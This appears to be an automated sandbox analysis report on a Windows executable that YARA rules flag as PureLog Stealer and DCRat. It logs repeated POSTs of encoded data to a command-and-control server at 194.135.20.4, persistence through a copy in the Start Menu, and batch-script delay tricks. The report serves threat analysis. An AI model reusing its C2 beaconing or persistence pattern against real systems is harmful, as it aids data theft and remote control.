                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:48:48 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.550004194.135.20.4806088C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:48:57.788095951 CET487OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:48:58.138127089 CET344OUTData Raw: 00 0b 01 00 06 09 01 04 05 06 02 01 02 02 01 0a 00 0a 05 0b 02 01 03 0d 01 56 0c 0c 07 02 01 53 0d 53 04 0c 02 03 04 01 0e 04 07 05 07 0a 06 01 03 0a 0b 09 0d 55 06 57 04 07 07 07 04 55 07 5b 01 53 0e 00 00 0f 06 05 0e 04 0f 03 0a 0d 0c 01 05 03
                                                        Data Ascii: VSSUWU[SS\L~N|c}_va}u\lR}M`lphZXx|{El^W_~hcd|iO~V@zm\L~be
                                                        Nov 2, 2024 17:48:58.612087011 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 38 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:48:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.550005194.135.20.4805528C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:49:09.516796112 CET535OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:49:09.874196053 CET344OUTData Raw: 05 06 04 05 03 0b 01 0a 05 06 02 01 02 00 01 00 00 05 05 08 02 01 03 08 03 01 0f 0d 07 04 03 50 0d 03 04 00 03 06 05 03 0c 50 02 00 05 00 05 03 04 07 0d 0f 0d 57 01 02 04 05 04 51 04 05 07 01 03 0b 0d 09 04 0f 05 06 0e 03 0e 00 0a 0c 0c 03 05 50
                                                        Data Ascii: PPWQPSXPUQU\L~NfcrqufsR|oivl]|]tJoBx^f|`tIkZ~u~V@xCnA~bq
                                                        Nov 2, 2024 17:49:10.363123894 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 31 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.550008194.135.20.4801852C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:49:23.024516106 CET535OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:49:23.372236967 CET344OUTData Raw: 00 0a 01 02 06 0c 01 03 05 06 02 01 02 07 01 03 00 0b 05 08 02 04 03 0c 02 51 0a 05 05 01 06 08 0c 03 05 0b 01 01 04 06 0e 07 05 51 05 51 02 07 05 05 0f 0f 0d 00 04 02 04 0e 06 0c 01 03 05 0a 00 05 0a 0b 00 05 05 51 0c 0f 0b 03 0a 0d 0e 01 05 51
                                                        Data Ascii: QQQQQ[XTU\L~ChYa]cryb\cShB\Yt|o^Mc[x|ZXxYuY}nhNwws[u~V@Ax}PA}ra
                                                        Nov 2, 2024 17:49:23.885118961 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 32 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.550009194.135.20.480
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:49:31.858023882 CET552OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:49:32.216011047 CET344OUTData Raw: 05 00 04 03 06 00 04 02 05 06 02 01 02 06 01 06 00 06 05 00 02 00 03 0a 00 01 0e 01 04 53 02 06 0c 05 04 5e 02 51 04 07 0e 04 07 05 05 07 05 02 07 04 0c 0c 0d 01 01 01 04 00 03 05 05 0b 07 00 02 05 0f 5c 07 56 07 09 0e 05 0d 0e 0f 01 0f 09 05 57
                                                        Data Ascii: S^Q\VWRQR\L~@czNwbP\wex||bXwR{Y|pwXoBoH{^}ZcP`wZj_~V@B{mb~ry
                                                        Nov 2, 2024 17:49:32.698788881 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.550011194.135.20.480
                                                        TimestampBytes transferredDirectionData
                                                        Nov 2, 2024 17:49:44.775507927 CET535OUTPOST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1
                                                        Content-Type: application/octet-stream
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                        Host: 194.135.20.4
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Nov 2, 2024 17:49:45.122374058 CET344OUTData Raw: 00 07 04 03 06 08 01 02 05 06 02 01 02 07 01 07 00 04 05 00 02 02 03 0b 01 0f 0e 05 07 00 03 54 0d 55 04 0e 07 0c 05 0a 0d 02 05 0b 00 03 05 55 03 0a 0d 0e 0f 55 04 51 01 01 06 06 07 07 07 0c 02 57 0e 0f 00 01 01 06 0e 53 0c 0f 0f 03 0c 08 07 01
                                                        Data Ascii: TUUUQWSUWR\L~@^fwLavul|BrX`lQY~sloRQlNjDhmQStYQ_~O~V@A{}T~\}
                                                        Nov 2, 2024 17:49:45.629149914 CET516INHTTP/1.1 100 Continue
                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 4e 6f 76 20 32 30 32 34 20 31 36 3a 34 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                        Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 16:49:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:12:47:21
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\Desktop\teh76E2k50.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\teh76E2k50.exe"
                                                        Imagebase:0x8f0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:12:47:31
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:12:47:31
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:12:47:32
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:12:47:32
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff717a10000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:12:47:42
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x610000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 71%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:12:47:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff717a10000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:12:47:56
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x360000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:12:48:03
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:12:48:04
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:12:48:04
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:12:48:04
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:12:48:10
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0xb10000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:12:48:14
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:23
                                                        Start time:12:48:14
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

